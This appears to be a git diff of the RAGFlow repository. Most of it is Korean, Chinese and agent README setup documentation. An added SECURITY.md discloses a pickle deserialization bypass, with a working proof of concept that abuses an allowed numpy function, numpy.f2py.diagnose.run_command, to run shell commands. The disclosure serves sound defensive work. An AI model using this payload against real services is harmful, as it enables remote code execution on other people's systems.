<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 🔥 업데이트
|
||||
|
||||
- 2024-09-13 지식베이스 Q&A 검색 모드를 추가합니다.
|
||||
|
||||
- 2024-09-09 Agent에 의료상담 템플릿을 추가하였습니다.
|
||||
|
||||
- 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
|
||||
|
||||
- 2024-08-02: [graphrag](https://github.com/microsoft/graphrag)와 마인드맵에서 영감을 받은 GraphRAG를 지원합니다.
|
||||
|
||||
- 2024-07-23: 오디오 파일 분석을 지원합니다.
|
||||
|
||||
- 2024-07-08: [Graph](./agent/README.md)를 기반으로 한 워크플로우를 지원합니다.
|
||||
|
||||
- 2024-06-27 Q&A 구문 분석 방식에서 Markdown 및 Docx를 지원하고, Docx 파일에서 이미지 추출, Markdown 파일에서 테이블 추출을 지원합니다.
|
||||
|
||||
- 2024-05-23: 더 나은 텍스트 검색을 위해 [RAPTOR](https://arxiv.org/html/2401.18059v1)를 지원합니다.
|
||||
|
||||
|
||||
|
||||
## 🌟 주요 기능
|
||||
|
||||
### 🍭 **"Quality in, quality out"**
|
||||
- [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
|
||||
- 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
|
||||
|
||||
### 🍱 **템플릿 기반의 chunking**
|
||||
- 똑똑하고 설명 가능한 방식.
|
||||
- 다양한 템플릿 옵션을 제공합니다.
|
||||
|
||||
|
||||
### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
|
||||
- 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
|
||||
- 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
|
||||
|
||||
|
||||
### 🍔 **다른 종류의 데이터 소스와의 호환성**
|
||||
- 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
|
||||
|
||||
### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
|
||||
- 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
|
||||
- 구성 가능한 LLM 및 임베딩 모델.
|
||||
- 다중 검색과 결합된 re-ranking.
|
||||
- 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
|
||||
|
||||
|
||||
## 🔎 시스템 아키텍처
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
||||
</div>
|
||||
|
||||
## 🎬 시작하기
|
||||
### 📝 사전 준비 사항
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치]((https://docs.docker.com/engine/install/))를 참조하세요.
|
||||
|
||||
|
||||
### 🚀 서버 시작하기
|
||||
|
||||
1. `vm.max_map_count`가 262144 이상인지 확인하세요:
|
||||
> `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
|
||||
>
|
||||
> ```bash
|
||||
> $ sysctl vm.max_map_count
|
||||
> ```
|
||||
>
|
||||
> 만약 `vm.max_map_count` 이 262144 보다 작다면 값을 쟈설정하세요.
|
||||
>
|
||||
> ```bash
|
||||
> # 이 경우에 262144로 설정했습니다.:
|
||||
> $ sudo sysctl -w vm.max_map_count=262144
|
||||
> ```
|
||||
>
|
||||
> 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
|
||||
>
|
||||
> ```bash
|
||||
> vm.max_map_count=262144
|
||||
> ```
|
||||
|
||||
2. 레포지토리를 클론하세요:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
```
|
||||
|
||||
3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
|
||||
|
||||
> 다음 명령어를 실행하면 *dev* 버전의 RAGFlow Docker 이미지가 자동으로 다운로드됩니다. 특정 Docker 버전을 다운로드하고 실행하려면, **docker/.env** 파일에서 `RAGFLOW_VERSION`을 원하는 버전으로 업데이트한 후, 예를 들어 `RAGFLOW_VERSION=v0.11.0`로 업데이트 한 뒤, 다음 명령어를 실행하세요.
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
> 기본 이미지는 약 9GB 크기이며 로드하는 데 시간이 걸릴 수 있습니다.
|
||||
|
||||
|
||||
4. 서버가 시작된 후 서버 상태를 확인하세요:
|
||||
|
||||
```bash
|
||||
$ docker logs -f ragflow-server
|
||||
```
|
||||
|
||||
_다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
|
||||
|
||||
```bash
|
||||
____ ______ __
|
||||
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
||||
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
||||
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
||||
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
||||
/____/
|
||||
|
||||
* Running on all addresses (0.0.0.0)
|
||||
* Running on http://127.0.0.1:9380
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network abnormal` 오류가 발생할 수 있습니다.
|
||||
|
||||
5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
|
||||
> 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
|
||||
6. [service_conf.yaml](./docker/service_conf.yaml) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
|
||||
> 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
|
||||
|
||||
_이제 쇼가 시작됩니다!_
|
||||
|
||||
## 🔧 설정
|
||||
|
||||
시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
|
||||
|
||||
- [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
|
||||
- [service_conf.yaml](./docker/service_conf.yaml): 백엔드 서비스를 구성합니다.
|
||||
- [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
|
||||
|
||||
[.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 내용과 일치하도록 해야 합니다.
|
||||
|
||||
> [./docker/README](./docker/README.md) 파일에는 환경 설정과 서비스 구성에 대한 자세한 설명이 있으며, [./docker/README](./docker/README.md) 파일에 나열된 모든 환경 설정이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 해당 구성과 일치하도록 해야 합니다.
|
||||
|
||||
기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
|
||||
|
||||
> 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
|
||||
>
|
||||
> ```bash
|
||||
> $ docker-compose up -d
|
||||
> ```
|
||||
|
||||
## 🛠️ 소스에서 빌드하기
|
||||
|
||||
Docker 이미지를 소스에서 빌드하려면:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:dev .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
|
||||
## 🛠️ 소스에서 서비스 시작하기
|
||||
|
||||
서비스를 소스에서 시작하려면:
|
||||
|
||||
1. 레포지토리를 클론하세요:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. 가상 환경을 생성하고, Anaconda 또는 Miniconda가 설치되어 있는지 확인하세요:
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
|
||||
```bash
|
||||
# CUDA 버전이 12.0보다 높은 경우, 다음 명령어를 추가로 실행하세요:
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. 진입 스크립트를 복사하고 환경 변수를 설정하세요:
|
||||
```bash
|
||||
# 파이썬 경로를 받아옵니다:
|
||||
$ which python
|
||||
# RAGFlow 프로젝트 경로를 받아옵니다:
|
||||
$ pwd
|
||||
```
|
||||
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
```
|
||||
|
||||
```bash
|
||||
# 실제 상황에 맞게 설정 조정하기 (다음 두 개의 export 명령어는 새로 추가되었습니다):
|
||||
# - `which python`의 결과를 `PY`에 할당합니다.
|
||||
# - `pwd`의 결과를 `PYTHONPATH`에 할당합니다.
|
||||
# - `LD_LIBRARY_PATH`가 설정되어 있는 경우 주석 처리합니다.
|
||||
# - 선택 사항: Hugging Face 미러 추가.
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. 다른 서비스(MinIO, Elasticsearch, Redis, MySQL)를 시작하세요:
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
```
|
||||
|
||||
5. 설정 파일을 확인하여 다음 사항을 확인하세요:
|
||||
- **docker/.env**의 설정이 **conf/service_conf.yaml**의 설정과 일치하는지 확인합니다.
|
||||
- **service_conf.yaml**의 관련 서비스에 대한 IP 주소와 포트가 로컬 머신의 IP 주소와 컨테이너에서 노출된 포트와 일치하는지 확인합니다.
|
||||
|
||||
|
||||
6. RAGFlow 백엔드 서비스를 시작합니다:
|
||||
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
|
||||
7. 프론트엔드 서비스를 시작합니다:
|
||||
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ vim .umirc.ts
|
||||
# proxy.target을 http://127.0.0.1:9380로 업데이트합니다.
|
||||
$ npm run dev
|
||||
```
|
||||
|
||||
8. 프론트엔드 서비스를 배포합니다:
|
||||
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ umi build
|
||||
$ mkdir -p /ragflow/web
|
||||
$ cp -r dist /ragflow/web
|
||||
$ apt install nginx -y
|
||||
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
||||
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
||||
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
||||
$ systemctl start nginx
|
||||
```
|
||||
|
||||
## 📚 문서
|
||||
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 로드맵
|
||||
|
||||
[RAGFlow 로드맵 2024](https://github.com/infiniflow/ragflow/issues/162)을 확인하세요.
|
||||
|
||||
## 🏄 커뮤니티
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 컨트리뷰션
|
||||
|
||||
RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](./docs/references/CONTRIBUTING.md)을 검토해 주세요.
|
||||
92
README_zh.md
92
README_zh.md
@ -7,7 +7,8 @@
|
||||
<p align="center">
|
||||
<a href="./README.md">English</a> |
|
||||
<a href="./README_zh.md">简体中文</a> |
|
||||
<a href="./README_ja.md">日本語</a>
|
||||
<a href="./README_ja.md">日本語</a> |
|
||||
<a href="./README_ko.md">한국어</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
@ -17,29 +18,43 @@
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.6.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.6.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
## 💡 RAGFlow 是什么?
|
||||
|
||||
[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
|
||||
|
||||
## 📌 近期更新
|
||||
## 🎮 Demo 试用
|
||||
|
||||
- 2024-05-21 支持流式结果输出和文本块获取API。
|
||||
- 2024-05-15 集成大模型 OpenAI GPT-4o。
|
||||
- 2024-05-08 集成大模型 DeepSeek。
|
||||
- 2024-04-26 增添了'文件管理'功能。
|
||||
- 2024-04-19 支持对话 API ([更多](./docs/conversation_api.md))。
|
||||
- 2024-04-16 集成嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 和 专为轻型和高速嵌入而设计的 [FastEmbed](https://github.com/qdrant/fastembed)。
|
||||
- 2024-04-11 支持用 [Xinference](./docs/xinference.md) 本地化部署大模型。
|
||||
- 2024-04-10 为‘Laws’版面分析增加了底层模型。
|
||||
- 2024-04-08 支持用 [Ollama](./docs/ollama.md) 本地化部署大模型。
|
||||
- 2024-04-07 支持中文界面。
|
||||
请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 🔥 近期更新
|
||||
|
||||
- 2024-09-13 增加知识库问答搜索模式。
|
||||
- 2024-09-09 在 Agent 中加入医疗问诊模板。
|
||||
- 2024-08-22 支持用RAG技术实现从自然语言到SQL语句的转换。
|
||||
- 2024-08-02 支持 GraphRAG 启发于 [graphrag](https://github.com/microsoft/graphrag) 和思维导图。
|
||||
- 2024-07-23 支持解析音频文件。
|
||||
- 2024-07-08 支持 Agentic RAG: 基于 [Graph](./agent/README.md) 的工作流。
|
||||
- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件,支持提取出 Docx 文件中的图片和 Markdown 文件中的表格。
|
||||
- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
|
||||
|
||||
## 🌟 主要功能
|
||||
|
||||
@ -60,7 +75,7 @@
|
||||
|
||||
### 🍔 **兼容各类异构数据源**
|
||||
|
||||
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
|
||||
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
|
||||
|
||||
### 🛀 **全程无忧、自动化的 RAG 工作流**
|
||||
|
||||
@ -87,7 +102,7 @@
|
||||
|
||||
### 🚀 启动服务器
|
||||
|
||||
1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/max_map_count.md)】:
|
||||
1. 确保 `vm.max_map_count` 不小于 262144:
|
||||
|
||||
> 如需确认 `vm.max_map_count` 的大小:
|
||||
>
|
||||
@ -122,7 +137,7 @@
|
||||
$ docker compose -f docker-compose-CN.yml up -d
|
||||
```
|
||||
|
||||
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.6.0,然后运行上述命令。
|
||||
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.11.0,然后运行上述命令。
|
||||
|
||||
> 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。
|
||||
|
||||
@ -147,13 +162,13 @@
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network anomaly` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
|
||||
> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network abnormal` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
|
||||
|
||||
5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
|
||||
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
|
||||
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
|
||||
|
||||
> 详见 [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md)。
|
||||
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
|
||||
|
||||
_好戏开始,接着奏乐接着舞!_
|
||||
|
||||
@ -184,7 +199,7 @@
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:v0.6.0 .
|
||||
$ docker build -t infiniflow/ragflow:v0.11.0 .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
@ -195,24 +210,27 @@ $ docker compose up -d
|
||||
如需从源码启动服务,请参考以下步骤:
|
||||
|
||||
1. 克隆仓库
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. 创建虚拟环境(确保已安装 Anaconda 或 Miniconda)
|
||||
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
如果cuda > 12.0,需额外执行以下命令:
|
||||
如果 cuda > 12.0,需额外执行以下命令:
|
||||
```bash
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. 拷贝入口脚本并配置环境变量
|
||||
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
@ -223,19 +241,20 @@ $ which python
|
||||
$ pwd
|
||||
```
|
||||
|
||||
将上述`which python`的输出作为`PY`的值,将`pwd`的输出作为`PYTHONPATH`的值。
|
||||
将上述 `which python` 的输出作为 `PY` 的值,将 `pwd` 的输出作为 `PYTHONPATH` 的值。
|
||||
|
||||
`LD_LIBRARY_PATH`如果环境已经配置好,可以注释掉。
|
||||
`LD_LIBRARY_PATH` 如果环境已经配置好,可以注释掉。
|
||||
|
||||
```bash
|
||||
# 此处配置需要按照实际情况调整,两个export为新增配置
|
||||
# 此处配置需要按照实际情况调整,两个 export 为新增配置
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
# 可选:添加Hugging Face镜像
|
||||
# 可选:添加 Hugging Face 镜像
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. 启动基础服务
|
||||
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
@ -245,20 +264,24 @@ $ docker compose -f docker-compose-base.yml up -d
|
||||
确保**docker/.env**中的配置与**conf/service_conf.yaml**中配置一致, **service_conf.yaml**中相关服务的IP地址与端口应该改成本机IP地址及容器映射出来的端口。
|
||||
|
||||
6. 启动服务
|
||||
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
|
||||
7. 启动WebUI服务
|
||||
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ vim .umirc.ts
|
||||
# 修改proxy.target为127.0.0.1:9380
|
||||
# 修改proxy.target为http://127.0.0.1:9380
|
||||
$ npm run dev
|
||||
```
|
||||
|
||||
8. 部署WebUI服务
|
||||
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
@ -273,8 +296,10 @@ $ systemctl start nginx
|
||||
```
|
||||
## 📚 技术文档
|
||||
|
||||
- [Quickstart](./docs/quickstart.md)
|
||||
- [FAQ](./docs/faq.md)
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 路线图
|
||||
|
||||
@ -284,10 +309,15 @@ $ systemctl start nginx
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 贡献指南
|
||||
|
||||
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) 。
|
||||
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](./docs/references/CONTRIBUTING.md) 。
|
||||
|
||||
## 🤝 商务合作
|
||||
|
||||
- [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
|
||||
|
||||
## 👥 加入社区
|
||||
|
||||
|
||||
74
SECURITY.md
Normal file
74
SECURITY.md
Normal file
@ -0,0 +1,74 @@
|
||||
# Security Policy
|
||||
|
||||
## Supported Versions
|
||||
|
||||
Use this section to tell people about which versions of your project are
|
||||
currently being supported with security updates.
|
||||
|
||||
| Version | Supported |
|
||||
| ------- | ------------------ |
|
||||
| <=0.7.0 | :white_check_mark: |
|
||||
|
||||
## Reporting a Vulnerability
|
||||
|
||||
### Branch name
|
||||
|
||||
main
|
||||
|
||||
### Actual behavior
|
||||
|
||||
The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
|
||||
The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
|
||||
|
||||
|
||||
### Steps to reproduce
|
||||
|
||||
|
||||
**ragflow_patch.py**
|
||||
|
||||
```py
|
||||
import builtins
|
||||
import io
|
||||
import pickle
|
||||
|
||||
safe_module = {
|
||||
'numpy',
|
||||
'rag_flow'
|
||||
}
|
||||
|
||||
|
||||
class RestrictedUnpickler(pickle.Unpickler):
|
||||
def find_class(self, module, name):
|
||||
import importlib
|
||||
if module.split('.')[0] in safe_module:
|
||||
_module = importlib.import_module(module)
|
||||
return getattr(_module, name)
|
||||
# Forbid everything else.
|
||||
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
|
||||
(module, name))
|
||||
|
||||
|
||||
def restricted_loads(src):
|
||||
"""Helper function analogous to pickle.loads()."""
|
||||
return RestrictedUnpickler(io.BytesIO(src)).load()
|
||||
```
|
||||
Then, **PoC.py**
|
||||
```py
|
||||
import pickle
|
||||
from ragflow_patch import restricted_loads
|
||||
class Exploit:
|
||||
def __reduce__(self):
|
||||
import numpy.f2py.diagnose
|
||||
return numpy.f2py.diagnose.run_command, ('whoami', )
|
||||
|
||||
Payload=pickle.dumps(Exploit())
|
||||
restricted_loads(Payload)
|
||||
```
|
||||
**Result**
|
||||

|
||||
|
||||
|
||||
### Additional information
|
||||
|
||||
#### How to prevent?
|
||||
Strictly filter the module and name before calling with getattr function.
|
||||
45
agent/README.md
Normal file
45
agent/README.md
Normal file
@ -0,0 +1,45 @@
|
||||
English | [简体中文](./README_zh.md)
|
||||
|
||||
# *Graph*
|
||||
|
||||
|
||||
## Introduction
|
||||
|
||||
*Graph* is a mathematical concept which is composed of nodes and edges.
|
||||
It is used to compose a complex work flow or agent.
|
||||
And this graph is beyond the DAG that we can use circles to describe our agent or work flow.
|
||||
Under this folder, we propose a test tool ./test/client.py which can test the DSLs such as json files in folder ./test/dsl_examples.
|
||||
Please use this client at the same folder you start RAGFlow. If it's run by Docker, please go into the container before running the client.
|
||||
Otherwise, correct configurations in conf/service_conf.yaml is essential.
|
||||
|
||||
```bash
|
||||
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
|
||||
usage: client.py [-h] -s DSL -t TENANT_ID -m
|
||||
|
||||
options:
|
||||
-h, --help show this help message and exit
|
||||
-s DSL, --dsl DSL input dsl
|
||||
-t TENANT_ID, --tenant_id TENANT_ID
|
||||
Tenant ID
|
||||
-m, --stream Stream output
|
||||
```
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/79179c5e-d4d6-464a-b6c4-5721cb329899" width="1000"/>
|
||||
</div>
|
||||
|
||||
|
||||
## How to gain a TENANT_ID in command line?
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
|
||||
</div>
|
||||
💡 We plan to display it here in the near future.
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
|
||||
</div>
|
||||
|
||||
|
||||
## How to set 'kb_ids' for component 'Retrieval' in DSL?
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
|
||||
</div>
|
||||
|
||||
46
agent/README_zh.md
Normal file
46
agent/README_zh.md
Normal file
@ -0,0 +1,46 @@
|
||||
[English](./README.md) | 简体中文
|
||||
|
||||
# *Graph*
|
||||
|
||||
|
||||
## 简介
|
||||
|
||||
"Graph"是一个由节点和边组成的数学概念。
|
||||
它被用来构建复杂的工作流或代理。
|
||||
这个图超越了有向无环图(DAG),我们可以使用循环来描述我们的代理或工作流。
|
||||
在这个文件夹下,我们提出了一个测试工具 ./test/client.py,
|
||||
它可以测试像文件夹./test/dsl_examples下一样的DSL文件。
|
||||
请在启动 RAGFlow 的同一文件夹中使用此客户端。如果它是通过 Docker 运行的,请在运行客户端之前进入容器。
|
